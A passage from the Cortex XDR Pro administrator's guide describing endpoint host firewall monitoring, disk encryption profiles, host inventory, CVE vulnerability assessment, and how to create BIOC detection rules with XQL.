T to view only the communication events on the endpoint to which the Cortex XDR host firewall rules were
applied, you can run the Cytool firewall show command.
Additionally, to monitor the communication on your endpoint, you can use the following operating system
utilities:
• Windows—Since the Cortex XDR Host Firewall leverages the Microsoft Windows Filtering Platform
(WFP), you can use a monitoring tool such as Network Shell (netsh), the Microsoft Windows command-
line utility to monitor the network communication on the endpoint.
• Mac—From the endpoint System Preferences > Security and Privacy > Firewall > Firewall options, you
can view the list of blocked and allowed applications in the firewall. The Cortex XDR host firewall blocks

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 157

© 2020 Palo Alto Networks, Inc.
 only incoming communications on Mac endpoints, still allowing outbound communication initiated from
the endpoint.

Disk Encryption
Cortex XDR provides full visibility into encrypted Windows and Mac endpoints that were encrypted using
BitLocker and FileVault, respectively. Additionally, you can apply Cortex XDR Disk Encryption rule on the
endpoints by creating disk encryption rules and policies that leverage BitLocker and FileVault capabilities.
Before you start applying disk encryption policy rules, ensure you meet the following requirements and
refer to these known limitations:

Requirement / Limitation Windows Mac

Endpoint Pre-requisites • The endpoint is running a • The endpoint is running a

Microsoft Windows version macOS version that supports
that supports BitLocker. FileVault.
• The endpoint is within the • The endpoint is running a
organization network domain. Cortex XDR agent 7.2 or later
• The endpoint is running a release.
Cortex XDR agent 7.1 or later
release
• To allow the agent to encrypt
the endpoint, Trusted
Platform Module (TPM) must
be supported and enabled on
the endpoint.
• To allow the agent to access
the encryption recovery key
backup, Active Directory
Domain Services must be
enabled on the endpoint.

Disk Encryption Scope You can enforce XDR disk • You can enforce XDR disk
encryption policy rules only on encryption policy rules only
the Operating System volume. on the Operating System
volume.
• The Cortex XDR Disk
Encryption profile for Mac
can encrypt the endpoint
disk, however it cannot
decrypt it. After you disable
the Cortex XDR policy
rule on the endpoint, you
can decrypt the endpoint
manually.

Other Group Policy configuration: • Provide a FileVaultMaster

certificate / institutional
• Make sure the GPO
recovery key (IRK) that is
configuration applying
signed by a valid authority.

158 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 Requirement / Limitation Windows Mac
to the endpoint enables • It can take the agent up to
Save BitLocker recovery 5 minutes to report the disk
information to AD DS for encryption status to Cortex
operating system drives. XDR if the endpoint was
• Make sure your Cortex XDR encrypted through Cortex
disk encryption policy does XDR, and up to one hour if
not conflict with the GPO it was encrypted through
configuration to Choose another MDM.
drive encryption method and • In line with the operating
cipher strength. system requirements, the
Cortex XDR encryption
profile will take place on
the endpoint after the
user logs off and back on,
and approves the prompt
to enable the endpoint
encryption.
• Palo Alto Networks
recommends you do
not apply an encryption
enforcement from another
MDM on the endpoint
together with the Cortex
XDR encryption profile.

Follow this high-level workflow to deploy the Cortex XDR disk encryption in your network:
• Monitor the Endpoint Encryption Status in Cortex XDR
• Configure a Disk Encryption Profile
• Apply Disk Encryption Profile to Your Endpoints

Monitor the Endpoint Encryption Status in Cortex XDR

You can monitor the Encryption Status of an endpoint in the new Endpoints > Disk Encryption Visibility
table. For each endpoint, the table lists both system and custom drives that were encrypted.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 159

© 2020 Palo Alto Networks, Inc.
 The following table describes both the default and additional optional fields that you can view in the Disk
Encryption Visibility table per endpoint. The fields are in alphabetical order.

Field Description

Encryption Status The endpoint encryption status can be:

• Applying Policy—Indicates that the Cortex XDR
disk encryption policy is in the process of being
applied on the endpoint.
• Compliant—Indicates that the Cortex XDR
agent encryption status on the endpoint is
compliant with the Cortex XDR disk encryption
policy.
• Not Compliant—Indicates that the Cortex XDR
agent encryption status on the endpoint is not
compliant with the Cortex XDR disk encryption
policy.
• Not Configured—Indicates that no disk
encryption rules are configured on the
endpoint.
• Not Supported—Indicates that the operating
system running on the endpoint is not
supported by Cortex XDR.
• Unmanaged—Indicates that the endpoint
encryption is not managed by Cortex XDR.

Endpoint ID Unique ID assigned by Cortex XDR that identifies

the endpoint.

Endpoint Name Hostname of the endpoint.

Endpoint Status The status of the endpoint. For more details, see
View Details About an Endpoint.

160 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 Field Description

IP Address Last known IPv4 or IPv6 address of the endpoint.

Last Reported Date and time of the last change in the agent’s
status. For more details, see View Details About an
Endpoint.

MAC Address The MAC address of the endpoint.

Operating System The platform running on the endpoint.

OS Version Name of the operating system version running on

the endpoint.

Volume Status Lists all the disks on the endpoint along with the
status per volume, Decrypted or Encrypted. For
Windows endpoints, Cortex XDR includes the
encryption method.

You can also monitor the endpoint Encryption Status in your Endpoint Administration table. If the
Encryption Status is missing from the table, add it.

Configure a Disk Encryption Profile

STEP 1 | Log in to Cortex XDR.
Go to Endpoints > Policy Management > Extensions Profiles and select + New Profile. Choose the
Platform and select Disk Encryption. Click Next.

STEP 2 | Fill-in the general information for the new profile.

Assign a name and an optional description to the profile.

STEP 3 | Enable disk encryption.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 161

© 2020 Palo Alto Networks, Inc.
 To enable the Cortex XDR agent to apply disk encryption rules using the operating system disk
encryption capabilities, Enable the Use disk encryption option.

STEP 4 | Configure Encryption details.

• For Windows:
• Encrypt or decrypt the system drives.
• Encrypt the entire disk or only the used disk space.
• For Mac:
Inline with the operating system requirements, when the Cortex XDR agent attempts to enforce an
encryption profile on an endpoint, the endpoint user is required to enter the login password. Limit the
number of login attempts to one or three. Otherwise, if you do not force log in attempts, the user can
continuously dismiss the operating system pop-up and the Cortex XDR agent will never encrypt the
endpoint.

STEP 5 | (Windows only) Specify the Encryption methods per operating system.
For each operating system (Windows 7, Windows 8-10, Windows 10 (1511) and above), select the
encryption method from the corresponding list.

You must select the same encryption method configured by the Microsoft Windows Group
Policy in your organization for the target endpoints. Otherwise, if you select a different
encryption method than the one already applied through the Windows Group Policy,
Cortex XDR will display errors.

STEP 6 | (Mac only) Upload the FileVaultMaster certificate.

To enable the Cortex XDR agent encrypt your endpoint, or to help users who forgot their password
to decrypt the endpoint, you must upload to Cortex XDR the FileVaultMaster certificate / institutional
recovery key (IRK). You must ensure the key is signed by a valid authority and upload a CER file only.

STEP 7 | Save your profile.

When you’re done, Create your disk encryption profile.

STEP 8 | Apply Disk Encryption Profile to Your Endpoints.

Apply Disk Encryption Profile to Your Endpoints

After you defined the required disk encryption profiles, you must configure the Protection Policies and
enforce them on your endpoints. Cortex XDR applies Protection policies on endpoints from top to bottom,
as you’ve ordered them on the page. The first policy that matches the endpoint is applied. If no policies
match, the default policy that enables all communication to and form the endpoint is applied.

STEP 1 | Log in to Cortex XDR.

Go to Endpoints > Policy Management > Extensions Policy Rules > +New policy.

STEP 2 | Configure settings for the disk encryption policy.

1. Assign a policy name and optional description.
The platform will automatically be assigned to Windows.
2. Assign the disk encryption profile you want to use in this rule.
3. If desired, assign Device Configuration and/or Device Exceptions profiles and/or Host Firewall
profiles. If none are assigned, the default profiles will be applied.

162 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 4. Click Next.
5. Select the target endpoints on which to enforce the policy.
Use filters or manual endpoint selection to define the exact target endpoints of the policy rules.
6. Click Done.
Alternatively, you can associate the disk encryption profile to an existing policy. Right-click the policy
and select Edit. Select the Disk Encryption profile and click Next. If needed, you can edit other settings
in the rule (such as target endpoints, description, etc.) When you’re done, click Done

STEP 3 | Configure policy hierarchy.

Drag and drop the policies in the desired order of execution.

STEP 4 | Save the policy hierarchy.

After the policy is saved and applied to the agents, Cortex XDR enforces the disk encryption policies on
your environment.

STEP 5 | Now, Monitor the Endpoint Encryption Status in Cortex XDR

Host Inventory
With Host inventory, you gain full visibility and inventory into the business and IT operational data on
all your endpoints. By reviewing inventory for all your hosts in a single place, you can quickly identify IT
and security issues that exist in your network, such as identifying a suspicious service or autorun that
were added to an endpoint. The Cortex XDR agent scans the endpoint every 24 hours for any updates.
Alternatively, you can rescan the endpoint to retrieve the most updated data. It can take Cortex XDR up to
6 hours to collect initial data from all endpoints in your network.
The following are prerequisites to enable Host inventory for your Cortex XDR instance:

Requirement Description

Licenses and Add-ons • Cortex XDR Pro per Endpoint license.

• Host Insights Add-on.

Supported Platforms • Windows—Cortex XDR agent 7.1 or a later release.

• Mac—Not supported.
• Linux—Cortex XDR agent 7.1 or a later release.

Setup and Permissions • Ensure Host Inventory Data Collection is enabled for your Cortex XDR
agent.

The Cortex XDR Host inventory includes the following entities and information, according to the operating
system running on the endpoint:

Entity Windows Mac Linux

Accessibility — —

Applications

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 163

© 2020 Palo Alto Networks, Inc.
 Entity Windows Mac Linux

Autoruns

Daemons —

Disks

Drivers —

Extensions — —

Groups

Mounts —

Services — —

Shares

System Information

Users

Users to Groups

For each entity, Cortex XDR lists all the details about the entity, and the details about the endpoint it
applies to. For example, the default Services view lists a separate row for every service on every endpoint:

164 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 Alternatively, to better understand the overall presence of each entity on the total number of endpoints,
you can switch to aggregated view (click ) and group the data by the main entity. You can also sort and
filter according the number of affected endpoints. For example, in the Services aggregated view, you can
sort by the number of affected endpoints to identify the least commonly deployed service in your network.
To get a closer view on all endpoints, right-click and select View affected endpoints:

View host inventory

To view the Host inventory, go to Add-ons > Host Insights > Host Inventory. You can export the tables and
respective asset views to a tab-separated values (TSV) file.

Data Description

Accessibility Details about installed applications that require and were allowed special
permissions to enable a camera, microphone, accessibility features, full disk
access, or screen captures.

Applications Details about all applications installed on your endpoints.

For each application, Cortex XDR lists the existing CVEs and the vulnerability
severity score that reflects the highest NIST vulnerability score detected for
the application.
To further examine these vulnerabilities, see Application Analysis.

Autoruns Details about executables that start automatically when the user logs in or
boots the endpoint.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 165

© 2020 Palo Alto Networks, Inc.
 Data Description
Cortex XDR displays information about autoruns that are configured in the
endpoint Registry, startup folders, scheduled tasks, services, drivers, daemons,
extensions, Crond tasks, login items, login and logout hooks.
For each autorun, Cortex XDR lists the autorun type and configuration, such as
startup method, CMD, user details, and image path.

Daemons Details about all daemons that exist on the endpoint.

For each daemon, Cortex XDR lists the following details:
• Information about the daemon, such as the name, type, and path.
• Daemon state, indicating whether it is loaded, running, or not running.

Disks Details about the disk volumes that exist on an endpoint.

For each disk that exists on an endpoint, Cortex XDR lists details such as the
drive type, name, file system, free space, and total size.

Drivers Details about all the drivers installed on an endpoint.

For each driver, Cortex XDR lists all the following details:
• Information about the driver, such as the driver name, type, and path.
• Listing details about the driver runtime configuration:
• The driver type
• Whether the driver is currently running, in which mode, and the runtime
state

Extensions Details about the system and kernel extensions currently running on your Mac
endpoints.
For each extension, Cortex XDR lists the following details:
• Extension type, name, path, and version.
• Extension state, indicating whether it is running, requires enabling, or
unloaded.

Groups Details about all user groups defined on an endpoint.

For each group, Cortex XDR lists identifying details, such as name, SID/GID
name and type.

Mounts Details about all the drives, volumes, and disks that were mounted on
endpoints.
For each mount, Cortex XDR lists the mount point directory, file system type,
mount spec and GUID.

Services Details about all the services running on an endpoint.

For each service, Cortex XDR lists all the following details:
• Information about the service, such as the service name, type, and path.
• Listing details about the service runtime configuration and status:

166 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
Data Description
• Whether the service is currently running and what is the runtime state
• Whether you can stop, pause, or delay the service start time
• Whether the service requires interaction with the endpoint desktop
• The name of the user who started the service and the start mode

Shares Details about network shared folders defined on an endpoint.

For each folder, Cortex XDR lists all the following details:
• Shared network folder type: Disk Drive, Print Queue, Device, IPC, Disk
Drive Admin, Print Queue Admin, Device Admin, IPC Admin.
• Identifying details such as folder name, description, and path.
• Whether the folder is limited to a maximum number of shares, and the
maximum number of allowed shares.

System Information General system information about an endpoint.

For each endpoint, Cortex XDR lists all the following details:
• Information about the endpoint hardware, such as manufacturer, model,
physical memory, processors architecture, and CPU.
• The operating system name and release running on the endpoint.

Users List of users whose credentials are stored on the endpoint.

For each user, Cortex XDR lists all the following details:
• Identifying details about the user, such as name and SID/UID.
• Details about the account, such as whether the account is active and the
account type.
• Information about the password set for this user account, such as whether
it is required to login, has an expiration date, or can be changed.

Users to Groups A list mapping all the users, local and in your domain, to the existing user
groups on an endpoint.

• Cortex XDR includes only the first 10,000 results per

endpoint.
• Cortex XDR lists only users that belong to each group
directly, and does not include users who belong to a group
within the main group.
• If a local users group includes a domain user (whose
credentials are stored on the Domain Controller server
and not on the endpoint), Cortex XDR will include this user
in the user-to-group mapping, but will not include it in the
users insights view.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 167

© 2020 Palo Alto Networks, Inc.
Vulnerability Assessment
Cortex XDR vulnerability assessment enables you to identify and quantify the security vulnerabilities on
an endpoint in Cortex XDR. Relying on the information from Cortex XDR, you can easily mitigate and
patch these vulnerabilities on all endpoints in your organization. To provide you with a comprehensive
understanding of the vulnerability severity, Cortex XDR retrieves the latest data for each CVE from the
NIST National Vulnerability Database, including CVE severity and metrics. You can use Cortex XDR to
evaluate the extent and severity of each CVE in your network, gain full visibility in to the risks to which each
endpoint is exposed, and assess the vulnerability status of an installed application in your network.
Collecting the initial data from all endpoints in your network could take up to 6 hours. After that, Cortex
XDR initiates periodical recalculations to rescan the endpoints and retrieve the updated data. If at any point
you want to force data recalculation, click Recalculate Now.

The following are prerequisites for Cortex XDR to perform vulnerability assessment of your endpoints:

Requirement Description

Licenses and Add-ons • Cortex XDR Pro per Endpoint license.

• Host Insights Add-on.

Supported Platforms • Windows—

• Cortex XDR agent 7.1 or a later release.
• Cortex XDR lists only CVEs relating to the operating system, and not
CVEs relating to applications provided by other vendors.
• Cortex XDR retrieves the latest data for each CVE from the NIST
National Vulnerability Database as well as from the Microsoft Security
Response Center (MSRC).
• For endpoints running Windows Insider, Cortex XDR cannot guarantee
an accurate CVE assessment.
• Cortex XDR does not display open CVEs for endpoints running
Windows releases for which Microsoft no longer fixes CVEs.
• Linux—Cortex XDR agent 7.1 or a later release.
• Mac—Not supported.

168 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 Requirement Description

Setup and Permissions • Ensure Host Inventory Data Collection is enabled for your Cortex XDR
agent.

Limitations Cortex XDR calculates CVEs for applications according to the application
version, and not according to application build numbers.

CVE Analysis
To evaluate the extent and severity of each CVE across your endpoints, you can drill down in to each CVE
in Cortex XDR and view all the endpoints and applications in your environment that are impacted by the
CVE. Cortex XDR retrieves the latest information from the NIST public database. From Add-ons > Host
Insights > Vulnerability Assessment, select CVEs on the upper-right bar. For each vulnerability, Cortex XDR
displays the following default and optional values:

Value Description

Affected endpoints The number of endpoints that are currently

affected by this CVE. For excluded CVEs, the
affected endpoints are N/A.

Applications The names of the applications affected by this

CVE.

CVE The name of the CVE.

Description The general NIST description of the CVE.

Excluded Indicates whether this CVE is excluded from all

endpoint and application views and filters, and
from all Host Insights widgets.

Platforms The name and version of the operating system

affected by this CVE.

Severity The severity level (High, Medium, or Low) of the

CVE as ranked in the NIST database.

Severity score The CVE severity score based on the NIST

Common Vulnerability Scoring System (CVSS).
Click the score to see the full CVSS description.

You can perform the following actions from Cortex XDR as you analyze the existing vulnerabilities:
• View a complete list of all endpoints in your network that are impacted by a CVE—Right-click the CVE
and View affected endpoints.
• Learn more about the applications in your network that are impacted by a CVE—Right-click the CVE
and View applications.
• Exclude irrelevant CVEs from your endpoints and applications analysis—Right-click the CVE and
Exclude. You can add a comment if needed, as well as Report CVE as incorrect for further analysis and
investigation by Palo Alto Networks. The CVE is grayed out and labeled Excluded and no longer appears

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 169

© 2020 Palo Alto Networks, Inc.
 on the Endpoints and Applications views in Vulnerability Assessment, or in the Host Insights widgets.
To restore the CVE, you can right-click the CVE and Undo exclusion at any time.

The CVE will be removed/reinstated to all views, filters, and widgets after the next
vulnerabilities recalculation.

Endpoint Analysis
To help you assess the vulnerability status of an endpoint, Cortex XDR provides a full list of all installed
applications and existing CVEs per endpoint and also assigns each endpoint a vulnerability severity score
that reflects the highest NIST vulnerability score detected on the endpoint. This information helps you
to determine the best course of action for remediating each endpoint. From Add-ons > Host Insights >
Vulnerability Assessment, select Endpoints on the upper-right bar. For each endpoint, Cortex XDR displays
the following default and optional values:

Value Description

CVEs A list of all CVEs that exist on applications that are

installed on the endpoint.

Cortex XDR displays a maximum

of 500 CVEs per endpoint. If your
endpoint has more than 500 CVEs,
you must address some of them
to reduce the number of CVEs
and rescan the endpoint. Then,
additional CVEs can be displayed.

Endpoint ID Unique ID assigned by Cortex XDR that identifies

the endpoint.

Endpoint name Hostname of the endpoint.

Last Reported Timestamp The date and time of the last time the Cortex
XDR agent started the process of reporting its
application inventory to Cortex XDR.

MAC address The MAC address associated with the endpoint.

IP address The IP address associated with the endpoint.

Platform The name of the platform running on the endpoint.

Severity The severity level (High, Medium, or Low) of the

CVE as ranked in the NIST database.

Severity score The CVE severity score based on the NIST

Common Vulnerability Scoring System (CVSS).
Click the score to see the full CVSS description.

You can perform the following actions from Cortex XDR as you investigate and remediate your endpoints:

170 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
 • View a complete list of all applications installed on an endpoint—Right-click the endpoint and View
installed applications. This list includes the application name, version, and installation path on the
endpoint. If an installed application has known vulnerabilities, Cortex XDR also displays the list of CVEs
and the highest Severity.
• (Windows only) Isolate an endpoint from your network—Right-click the endpoint and Isolate the
endpoint before or during your remediation to allow the Cortex XDR agent to communicate only with
Cortex XDR.
• (Windows only) View a complete list of all KBs installed on an endpoint—Right-click the endpoint and
View installed kbs. This list includes all the Microsoft Windows patches that were installed on the
endpoint and a link to the Microsoft official Knowledge Base (KB) support article.
• Retrieve an updated list of applications installed on an endpoint—Right-click the endpoint and Rescan
endpoint.

Application Analysis
You can assess the vulnerability status of applications in your network using the Host inventory. Cortex
XDR compiles an application inventory of all the applications installed in your network by collecting from
each Cortex XDR agent the list of installed applications. For each application on the list, you can see the
existing CVEs and the vulnerability severity score that reflects the highest NIST vulnerability score detected
for the application. Any new application installed on the endpoint will appear in Cortex XDR with 24 hours.
Alternatively, you can re-scan the endpoint to retrieve the most updated list.

Starting with macOS 10.15, Mac built-in system applications are not reported by the Cortex
XDR agent and are not part of the Cortex XDR Application Inventory.

From Add-ons > Host Insights > Vulnerability Assessment, select Apps. For each application, Cortex XDR
displays the following default and optional values:

Value Description

Affected endpoints The number of endpoints that are currently

affected by this CVE.

Application name The name of the application affected by this CVE.

CVEs A list of all CVEs that exist on applications that are

installed on the endpoint.

Cortex XDR displays a maximum

of 500 CVEs per endpoint. If your
endpoint has more than 500 CVEs,
you must address some of them
to reduce the number of CVEs
and rescan the endpoint. Then,
additional CVEs can be displayed.

Platform A list of all platforms on which the application is

installed.

Severity The severity level (High, Medium, or Low) of the

CVE as ranked in the NIST database.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 171

© 2020 Palo Alto Networks, Inc.
 Value Description

Severity score The CVE severity score based on the NIST

Common Vulnerability Scoring System (CVSS).
Click the score to see the full CVSS description.

Version The version of the installed application.

• To view the details of all the endpoints in your network on which an application is installed, right click
the application and View endpoints.

172 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

Investigation and Response
> Cortex XDR Indicators
> Search Queries
> Investigate Incidents
> Investigate Alerts
> Investigate Endpoints
> Investigate Files
> Response Actions

173
174 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response
© 2020 Palo Alto Networks, Inc.
Cortex XDR Indicators
When you identify a threat, you can define specific indicators for which you want Cortex XDR to raise
alerts. You can define rules for the following types of indicators:
• Behavioral indicators of compromise (BIOCs)—Identifying threats based on their behaviors can be quite
complex. As you identify specific network, process, file, or registry activity that indicates a threat, you
create BIOCs that can alert you when the behavior is detected. If you enable Cortex XDR - Analytics
enabled, Cortex XDR can also raise Analytics BIOCs (ABIOCs).
• Indicators of compromise (IOCs)—Known artifacts that are considered malicious or suspicious. IOCs are
static and based on criteria such as SHA256 hashes, IP addresses and domains, file names, and paths.
You create IOC rules based on information that you gather from various threat-intelligence feeds or that
you gather as a result of an investigation within Cortex XDR. See Working with IOCs.
After you create an indicator rule, you can Manage Existing Indicators from Cortex XDR.

Working with BIOCs

Behavioral indicators of compromise (BIOCs) enable you to alert and respond to behaviors—tactics,
techniques, and procedures. Instead of hashes and other traditional indicators of compromise, BIOC rules
detect behavior such as is related to processes, registry, files, and network activity.
To enable you to take advantage of the latest threat research, Cortex XDR automatically receives
preconfigured rules from Palo Alto Networks. These global rules are delivered to all tenants with content
updates. In cases where you need to override a global BIOC rule, you can disable it or set a rule exception.
You can also configure additional BIOC rules as you investigate threats on your network and endpoints.
BIOC rules are highly customizable: you can create a BIOC rule that is simple or quite complex.
As soon as you create or enable a BIOC rule, the app begins to monitor input feeds for matches. Cortex
XDR also analyzes historical data collected in the Cortex Data Lake. Whenever there is a match, or hit, on a
BIOC rule, Cortex XDR logs an Cortex XDR Alerts.
To further enhance the BIOC rule capabilities, you can also configure BIOC rules as custom prevention
rules and incorporate them with your Restrictions profiles. Cortex XDR can then raise behavioral threat
prevention alerts based on your custom prevention rules in addition to the BIOC detection alerts.
• BIOC Rule Details
• Create a BIOC Rule
• Manage Existing Indicators
• Manage Global BIOC Rules

BIOC Rule Details

If you are assigned a role that enables Investigation > Rules privileges, you can view all user-defined and
preconfigured rules for behavioral indicators of compromise (BIOCs) from Rules > BIOC.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 175

© 2020 Palo Alto Networks, Inc.
 If you have Cortex XDR - Analytics enabled, Cortex XDR also provides a separate page from which you can
view Analytics BIOCs (ABIOCs). To access this page, use the link next to the refresh icon at the top of the
page.
Each page displays fields that are relevant for the specific rule type. For more information, see:
• BIOC Rules Fields
• Analytics BIOC Fields
BIOC Rules Fields
By default, the BIOC Rules page displays all enabled rules. To search for a specific rule, use the filters above
the results table to narrow the results. From the BIOC Rules page, you can also manage existing rules using
the right-click pivot menu.
The following table describes the fields that are available for each BIOC rule in alphabetical order.

Field Description

# OF HITS The number of hits (matches) on this rule.

BACKWARDS SCAN STATUS Status of the Cortex XDR search for the first 10,000 matches
when the BIOC rule was created or edited. Status can be:
• Done
• Failed
• Pending
• Queued

BACKWARDS SCAN TIMETAMP Timestamp of the Cortex XDR search for the first 10,000
matches in your Cortex XDR when the BIOC rule was created
or edited.

BACKWARDS SCAN RETRIES Number of times Cortex XDR searched for the first 10,000
matches in your Cortex XDR when the BIOC rule was created
or edited.

BEHAVIOR A schematic of the behavior of the rule.

COMMENT Free-form comments specified when the BIOC was created

or modified.

EXCEPTIONS Exceptions to the BIOC rule. When there's a match on the

exception, the event will not trigger an alert.

GLOBAL RULE ID Unique identification number assigned to rules created by

Palo Alto Networks.

INSERTION DATE Date and time when the BIOC rule was created.

MITRE ATT&CK TACTIC Displays the type of MITRE ATT&CK tactic the BIOC rule is
attempting to trigger on.

MITRE ATT&CK TECHNIQUE Displays the type of MITRE ATT&CK technique and sub-
technique the BIOC rule is attempting to trigger on.

176 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Field Description

MODIFICATION DATE Date and time when the BIOC was last modified.

NAME Unique name that describes the rule. Global BIOC rules
defined by Palo Alto Networks are indicated with a blue dot
and cannot be modified or deleted.

RULE ID Unique identification number for the rule.

TYPE Type of BIOC rule:

• Collection
• Credential Access
• Dropper
• Evasion
• Execution
• Evasive
• Exfiltration
• File Privilege Manipulation
• File Type Obfuscation
• Infiltration
• Lateral Movement
• Other
• Persistence
• Privilege Escalation
• Reconnaissance
• Tampering

SEVERITY BIOC severity that was defined when the BIOC was created.

SOURCE User who created this BIOC, the file name from which it was
created, or Palo Alto Networks if delivered through content
updates.

STATUS Rule status: Enabled or Disabled.

USED IN PROFILES Displays if the BIOC rule is associated with a Restriction

profile.

Analytics BIOC Fields

By default, the Analytics BIOC Rules page displays all enabled rules. To search for a specific rule, use the
filters above the results table to narrow the results. From the Analytics BIOC Rules page, you can also
disable and enable rules using the right-click pivot menu.
The following table describes the fields that are available for each Analytics BIOC rule in alphabetical order.

Field Description

Description Description of the behavior that will raise the alert.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 177

© 2020 Palo Alto Networks, Inc.
 Field Description

GLOBAL RULE ID Unique identification number assigned to rules created by

Palo Alto Networks.

INSERTION DATE Date and time when the BIOC rule was created.

MITRE ATT&CK TACTIC Displays the type of MITRE ATT&CK tactic the BIOC rule is
attempting to trigger on.

MITRE ATT&CK TECHNIQUE Displays the type of MITRE ATT&CK technique and sub-
technique the BIOC rule is attempting to trigger on.

MODIFICATION DATE Date and time when the BIOC was last modified.

NAME Unique name that describes the rule. New rules are identified
with a blue badge icon.

SEVERITY BIOC severity that was defined when the BIOC was created.

STATUS Rule status: Enabled or Disabled.

Create a BIOC Rule

After identifying a threat and its characteristics, you can configure rules for behavioral indicators of
compromise (BIOCs). After you create a BIOC rule, Cortex XDR searches for the first 10,000 matches in
your Cortex Data Lake and raise an alert if a match is detected. Going forward, the app alerts when a new
match is detected.

To ensure your BIOC rules raise alerts efficiently and do not overcrowd your Alerts table,
Cortex XDR automatically disables BIOC rules that reach 5000 or more hits over a 24 hour
period.

• Create a Rule from Scratch

• Configure a Custom Prevention Rule
• Import Rules
Create a Rule from Scratch
Creating a new BIOC rule is similar to the way you create a search with Query Builder. You use XQL to
define the rule. The XQL query must at a minimum filter on the event_type field in order for it to be a
valid BIOC rule. For example:

dataset = xdr_data
| filter event_type = PROCESS and
event_sub_type = PROCESS_START and
action_process_image_name ~= ".*?\.(?:pdf|docx)\.exe"

Only the filter stage is supported for XQL queries that define a BIOC.

The following describes the event_type values for which you can create a BIOC rule:

178 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • FILE—Events relating to file create, write, read, and rename according to the file name and path.
• INJECTION—Events related to process injections.
• LOAD_IMAGE—Events relating to module IDs of processes.
• NETWORK—Events relating to incoming and outgoing network, filed IP addresses, port, host name, and
protocol.
• PROCESS—Events relating to execution and injection of a process name, hash, path, and CMD.
• REGISTRY—Events relating to registry write, rename and delete according to registry path.
• STORY—Events relating to a combination of firewall and endpoint logs over the network.
• WINDOWS_EVENT_LOG—Events relating to Windows Event Log.
To create a BIOC rule:

STEP 1 | From Cortex XDR, select Rules > BIOC.

STEP 2 | Select + Add Rule.

STEP 3 | Configure the BIOC criteria.

Define any relevant activity or characteristics for the entity type. Creating a new BIOC rule is similar to
the way that you create a search with Query Builder. You use XQL to define the rule. The XQL query
must filter on an event_type in order for it to be a valid BIOC rule.

STEP 4 | Test your BIOC rule.

Rules that you do not refine enough can create thousands of alerts. As a result, it is highly recommended
that you test the behavior of a new or edited BIOC rule before you save it. For example, if a rule will
return thousands of hits because you negated a single parameter, it is a good idea to test the rule before
you save it and make it active.
When you test the rule, Cortex XDR immediately searches for rule matches across all your Cortex Data
Lake data. If there are surprises, now is the time to see them and adjust the rule definition.

For the purpose of showing you the expected behavior of the rule before you save it,
Cortex XDR tests the BIOC on historical logs. After you save a BIOC rule, it will operate
on both historical logs (up to 10,000 hits) and new data received from your log sensors.

STEP 5 | Save your BIOC rule.

STEP 6 | Define your BIOC properties.

1. Enter a descriptive Name to identify the BIOC rule.
2. Select a rule TYPE which describes the activity.
3. Specify the SEVERITY you want to associate with the alert.
4. (Optional) Select the MITRE Tactic and MITRE Technique you want to associate with the alert. You
can select up to 3 MITRE Tactics and MITRE Techniques/Sub-Techniques.
5. Enter any additional comments such as why you created the BIOC.
6. Click OK.

STEP 7 | Save your BIOC rule.

Configure a Custom Prevention Rule

Custom prevention rules are supported on Cortex XDR agent 7.2 and later versions and enable you to
configure and apply user-defined BIOC rules to Restriction profiles deployed on your Windows, Mac, and
Linux endpoints.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 179

© 2020 Palo Alto Networks, Inc.
 By using the BIOC rules, you can configure custom prevention rules to terminate the causality chain of a
malicious process according to the Action Mode defined in the associated Restrictions Security Profile and
trigger Cortex XDR Agent behavioral prevention type alerts in addition to the BIOC rule detection alerts.
For example, if you configure a custom prevention rule for a BIOC Process event, apply it to Restrictions
profile with an action mode set to Block, the Cortex XDR agent:
• Blocks a process at the endpoint level according to the defined rule properties.
• Raises a behavioral prevention alert you can monitor and investigate in the Alerts table.
Before you configure a BIOC rule as a custom prevention rule, create a Restriction Profile for each type of
operating system (OS) that you want to deploy your prevention rules.
To configure a BIOC rule as a prevention rule:

STEP 1 | In the BIOC Rule table, from the Source field, filter and locate a user-defined rule you want to
apply as a custom prevention rule. You can only apply a BIOC rule that you created either from
scratch or a Cortex XDR Global Rule template that meets the following criteria:
• The user-defined BIOC rule event does not include the following field configurations:
• All Events—Host Name
• File Event—Device Type, Device Serial Number
• Process Event—Device Type, Device Serial Number
• Registry Event—Country, Raw Packet
• BIOC rules with OS scope definitions must align with the Restrictions profile OS.
• When defining the Process criteria for a user-defined BIOC rule event type, you can select to run
only on actor, causality, and OS actor on Windows, and causality and OS actor on Linux and Mac.

STEP 2 | Test your BIOC rule.

Rules that you do not refine enough can create thousands of alerts. As a result, it is highly recommended
that you test the behavior of a new or edited BIOC rule before you save it. Cortex XDR automatically
